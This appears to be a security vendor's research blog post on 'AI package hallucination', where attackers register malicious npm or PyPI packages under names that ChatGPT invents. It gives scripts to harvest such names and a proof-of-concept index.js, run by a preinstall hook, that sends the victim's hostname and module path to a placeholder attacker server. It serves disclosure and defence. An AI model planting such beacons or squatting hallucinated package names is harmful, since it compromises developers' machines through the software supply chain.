Voyager18 (research)

Can you trust ChatGPT’s package recommendations?

ChatGPT can offer coding solutions, but its tendency for hallucination presents attackers with an opportunity. Here's what we learned.

Bar Lanyado | June 06, 2023

Contributors: Ortal Keizman, Yair Divinsky

In our research, we have discovered that attackers can easily use ChatGPT to help them spread malicious packages into developers’ environments. Given the widespread, rapid proliferation of AI tech for essentially every business use case, the nature of software supply chains, and the broad adoption of open-source code libraries, we feel an early warning to cyber and IT security professionals is necessary, timely, and appropriate. 

In this blog post, and in an upcoming webinar on June 21st, we will detail our findings, including a PoC of the attack.

Why did we start this research?

Unless you have been living under a rock, you’ll be well aware of the generative AI craze. In the last year, millions of people have started using ChatGPT to support their work efforts, finding that it can significantly ease the burdens of their day-to-day workloads. That being said, there are some shortcomings. 

We’ve seen ChatGPT generate URLs, references, and even code libraries and functions that do not actually exist. These LLM (large language model) hallucinations have been reported before and may be the result of old training data.

If ChatGPT is fabricating code libraries (packages), attackers could use these hallucinations to spread malicious packages without using familiar techniques like typosquatting or masquerading. 

Those techniques are suspicious and already detectable. But if an attacker can create a package to replace the “fake” packages recommended by ChatGPT, they might be able to get a victim to download and use it.

The impact of this issue becomes clear when you consider that, whereas developers previously searched for coding solutions online (for example, on Stack Overflow), many have now turned to ChatGPT for answers, creating a major opportunity for attackers.

The attack technique – use ChatGPT to spread malicious packages

We have identified a new malicious package spreading technique, which we call "AI package hallucination."

The technique relies on the fact that ChatGPT, and likely other generative AI platforms, sometimes answers questions with hallucinated sources, links, blogs and statistics. It will even generate questionable fixes to CVEs, and – in this specific case – offer links to coding libraries that don’t actually exist. 

Using this technique, an attacker starts by formulating a question asking ChatGPT for a package that will solve a coding problem. ChatGPT then responds with multiple packages, some of which may not exist. This is where things get dangerous: when ChatGPT recommends packages that are not published in a legitimate package repository (e.g. npmjs, PyPI).

When the attacker finds a recommendation for an unpublished package, they can publish their own malicious package in its place. The next time a user asks a similar question they may receive a recommendation from ChatGPT to use the now-existing malicious package. We recreated this scenario in the proof of concept below using ChatGPT 3.5.

Popular techniques for spreading malicious packages

  1. Typosquatting
  2. Masquerading
  3. Dependency Confusion
  4. Software Package Hijacking
  5. Trojan Package
Source: JFrog

AI package hallucination is the root of the problem

The problem with ChatGPT's package recommendations is likely the result of a specific kind of LLM hallucination, which we are calling AI package hallucination, in which ChatGPT bases its recommendations on old data and information it was trained on.

What is an LLM hallucination?

Large language models (LLMs), like ChatGPT, can produce striking instances of hallucination, where the model generates responses that read as confident and coherent but do not align with factual reality. Because they are trained on vast amounts of text data, LLMs can extrapolate beyond that training and produce plausible-sounding but fictional information.

In our case, ChatGPT may infer a package name from data it has seen on GitHub or other similar sources, and suggest it as though it were a valid, published package.

As we know, ChatGPT's answers are currently based on GPT-3.5, which was trained on data gathered through September 2021. Reliance on this data could also lead ChatGPT to recommend a package that was available in the past but no longer exists today.

Finding the attack vector in ChatGPT

The goal of our research was to find unpublished packages recommended for use by ChatGPT.

The first step was to find reasonable questions we could ask, based on real-life scenarios.

To find these questions, we referenced Stack Overflow to get the most popular coding questions people ask about parsing, serialization, math, scraping, and specific technologies (e.g. Flask, ArangoDB, Istio). Altogether, we checked over 40 subjects and took the 100 most popular questions for each.

All of these questions were then filtered by the programming language included with the question (Node.js, Python, Go). Once we had collected these frequently asked questions, we narrowed the list down to only the "how to" questions.
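As a minimal sketch of this collection step, and assuming the public Stack Exchange API (the tags, subjects, and "how to" filter below are illustrative, not the exact tooling used in the research), the question harvesting could look something like this:

```javascript
// harvest-questions.js – illustrative sketch; the actual collection script isn't published,
// so the use of the public Stack Exchange API here is an assumption.
const LANGUAGES = ['node.js', 'python', 'go'];
const SUBJECTS = ['parsing', 'serialization', 'math', 'web-scraping', 'flask', 'arangodb', 'istio'];

async function topHowToQuestions(subject, language) {
  const url = 'https://api.stackexchange.com/2.3/questions?' + new URLSearchParams({
    site: 'stackoverflow',
    tagged: `${subject};${language}`, // questions tagged with both the subject and the language
    sort: 'votes',
    order: 'desc',
    pagesize: '100',                  // the 100 most popular questions per subject
  });
  const { items = [] } = await (await fetch(url)).json();
  // Keep only the "how to" style questions, as described above.
  return items.map((q) => q.title).filter((title) => /how\s+(to|do|can)/i.test(title));
}

// Example (hypothetical tag combination): top "how to" Flask questions asked in Python.
topHowToQuestions(SUBJECTS[4], LANGUAGES[1]).then(console.log);
```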

Then, we asked ChatGPT, through its API, all the questions we had collected. We used the API to replicate an attacker's approach: getting as many non-existent package recommendations as possible in the shortest space of time.

In addition to each question, and following ChatGPT's answer, we added a follow-up question asking it to provide more packages that also answered the query. We saved all the conversations to a file and then analyzed the answers.
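Sketched in code, and assuming the standard Chat Completions endpoint with the gpt-3.5-turbo model (the prompts and file names below are illustrative, not our exact scripts), that query loop looks roughly like this:

```javascript
// ask-chatgpt.js – illustrative sketch of the question/follow-up loop described above.
const fs = require('fs');

async function chat(messages) {
  const res = await fetch('https://api.openai.com/v1/chat/completions', {
    method: 'POST',
    headers: {
      Authorization: `Bearer ${process.env.OPENAI_API_KEY}`,
      'Content-Type': 'application/json',
    },
    body: JSON.stringify({ model: 'gpt-3.5-turbo', messages }),
  });
  const data = await res.json();
  return data.choices[0].message.content;
}

async function askWithFollowUp(question) {
  const messages = [{ role: 'user', content: question }];
  const firstAnswer = await chat(messages);

  // Follow-up: ask for more packages that also answer the same query.
  messages.push({ role: 'assistant', content: firstAnswer });
  messages.push({ role: 'user', content: 'Please provide more packages that also solve this.' });
  const secondAnswer = await chat(messages);

  // Save the whole conversation to a file for later analysis.
  fs.appendFileSync('conversations.jsonl', JSON.stringify({ question, firstAnswer, secondAnswer }) + '\n');
}
```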

In each answer, we looked for a pattern in the package installation command and extracted the recommended package. We then checked to see if the recommended package existed. If it didn’t, we tried to publish it ourselves. For this research we asked ChatGPT questions in the context of Node.js and Python.
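As an illustration of that analysis step, the pattern match and the existence check could be sketched as follows; the regex is an assumption, while the npm and PyPI registry endpoints are public, and a 404 marks an unpublished (and therefore claimable) package:

```javascript
// check-packages.js – illustrative sketch; the real analysis script isn't published.
const INSTALL_RE = /\b(?:npm install|pip install)\s+([A-Za-z0-9@/._-]+)/g;

// Pull the recommended package names out of a saved ChatGPT answer.
function extractPackages(answer) {
  return [...answer.matchAll(INSTALL_RE)].map((match) => match[1]);
}

// A 404 from the registry means the recommended package is unpublished.
async function existsOnNpm(name) {
  return (await fetch(`https://registry.npmjs.org/${name}`)).status === 200;
}

async function existsOnPyPI(name) {
  return (await fetch(`https://pypi.org/pypi/${name}/json`)).status === 200;
}
```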

In Node.js, we posed 201 questions and observed that more than 40 of them elicited a response that included at least one package that had not been published.

In total, we received more than 50 unpublished npm packages.

In Python, we asked 227 questions and, for more than 80 of them, we received at least one unpublished package, giving a total of over 100 unpublished pip packages.

The ChatGPT 3.5 AI package hallucination PoC

In the PoC we will see a conversation between an attacker and ChatGPT, using the API, where ChatGPT will suggest an unpublished npm package named arangodb. Following this, the simulated attacker will publish a malicious package to the NPM repository to set a trap for an unsuspecting user.

Next, we show a conversation with a user asking ChatGPT the same question, where it replies with the same originally non-existent package. However, the package now exists as our malicious creation.

Finally, the user installs the package and the malicious code can execute.

The conversation between the attacker and ChatGPT

ChatGPT recommends installing the arangodb package.

The first question in the attacker’s conversation with ChatGPT:
“How to integrate with arangodb in node.js? Please return the package to install in the pattern of npm install”

The attacker’s second question, and ChatGPT’s response with a suggestion to install the arangodb package:

The suggested package does not exist in npmjs:

The hypothetical attacker writes a malicious package and publishes it to npm.

Since this is a simulation, our package won't do anything harmful; it will simply be invoked via node index.js, which we can later watch for:

In this next image, we can see the code that runs on the victim's device when they install the package. The program sends the device hostname, the name of the package it came from, and the absolute path of the directory containing the module file to the threat actor's server:
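In outline, such a trap package needs little more than a preinstall hook and a small index.js. The sketch below is a reconstruction based on the description above, not the package we published; the collection domain and parameter names are placeholders:

```javascript
// index.js – reconstruction of the benign PoC beacon; attacker-server.example and the
// field names are placeholders, not real infrastructure.
// package.json triggers it with:  "scripts": { "preinstall": "node index.js" }
const os = require('os');
const path = require('path');
const https = require('https');

const payload = new URLSearchParams({
  host: os.hostname(),                            // the victim device's hostname
  pkg: process.env.npm_package_name || 'unknown', // the package the beacon came from
  dir: path.resolve(__dirname),                   // absolute path of the module's directory
});

// The actual PoC encoded this data into a long request hostname; a plain HTTPS
// callback keeps this sketch simple.
https.get(`https://attacker-server.example/collect?${payload}`, () => {}).on('error', () => {});
```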

The package is now available in npmjs:

The conversation between the victim and ChatGPT

Our unsuspecting victim asks ChatGPT a question similar to the attacker's, and ChatGPT responds with the now-malicious package:

The victim installs the malicious package following ChatGPT’s recommendation.

The attacker receives data from the victim, sent by our preinstall call to node index.js to the long hostname:

How to spot AI package hallucinations

It can be difficult to tell if a package is malicious if the threat actor effectively obfuscates their work, or uses additional techniques such as making a trojan package that is actually functional.

Given how these actors pull off supply chain attacks by deploying malicious libraries to known repositories, it’s important for developers to vet the libraries they use to make sure they are legitimate. This is even more important with suggestions from tools like ChatGPT which may recommend packages that don’t actually exist, or didn’t before a threat actor created them.

There are multiple ways to do this, including checking the creation date and number of downloads, looking for comments and stars (or a lack of them), and reading any of the library's attached notes. If anything looks suspicious, think twice before you install it.
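For npm packages, several of these signals can even be checked programmatically before installing. The snippet below is a minimal sketch using npm's public registry and download-count APIs, not a complete vetting process; the package name is just the example from the PoC above:

```javascript
// vet-package.js – quick pre-install sanity checks for a recommended package.
async function vet(name) {
  const meta = await (await fetch(`https://registry.npmjs.org/${name}`)).json();
  const stats = await (await fetch(`https://api.npmjs.org/downloads/point/last-month/${name}`)).json();

  console.log({
    created: meta.time && meta.time.created,            // a brand-new creation date is a red flag
    versions: Object.keys(meta.versions || {}).length,  // a single rushed release is another weak signal
    lastMonthDownloads: stats.downloads || 0,           // near-zero adoption deserves suspicion
    description: meta.description || '(none)',
  });
}

vet('arangodb');
```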

Next steps 

Each new vulnerability is a reminder of where we stand, and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: 

  1. Vulcan Cyber named a Leader in Forrester Wave Vulnerability Risk Management
  2. OWASP Top 10 LLM risks – what we learned
  3. What the AI revolution means for cyber risk
  4. MITRE ATT&CK framework – Mapping techniques to CVEs
  5. OWASP Top 10 vulnerabilities 2022: what we learned 
  6. How to fix CVE-2023-32784 in KeePass password manager

Want to dive deeper? Join hundreds of cyber risk professionals and check out the story behind the story.

And finally… 

Don’t get found out by new vulnerabilities. Vulcan Cyber gives you full visibility and oversight of your threat environment and lets you prioritize, remediate and communicate your cyber risk across your entire organization. Get a demo today. 

 

 
